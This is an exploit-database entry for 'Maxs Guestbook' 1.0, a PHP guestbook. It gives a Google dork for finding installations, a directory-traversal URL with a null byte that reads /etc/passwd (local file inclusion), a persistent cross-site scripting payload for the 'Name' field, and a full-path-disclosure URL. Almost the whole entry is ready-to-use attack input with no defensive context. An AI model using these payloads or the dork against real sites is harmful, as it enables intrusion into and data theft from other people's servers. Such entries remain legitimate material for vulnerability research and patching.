exploit-db-mirror/platforms/php/webapps/18595.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

25 lines
573 B
Text
Executable file

# Exploit Title: Maxs Guestbook
# Google Dork: "Powered by PHP F1"
# Date: 14/03/2012
# Author: n0tch aka andmuchmore
# Software Link: http://www.phpf1.com/download.html?dl=18
# Version: 1.0
# Tested on: Windows 7 / Linux(Ubuntu)
+[-- LFI --]+
http://localhost/max/index.php?page=../../../../../../../../../../../../../../../../../etc/passwd%00
+[-- Persistent XSS --]+
Vulnerable Field = "Name"
Payload syntax: <script>alert('hello')</script>
+[-- FPD --]+
http://localhost/max/index.php?page[]=2
+[-- Shoutz --]+
All the belegit crew..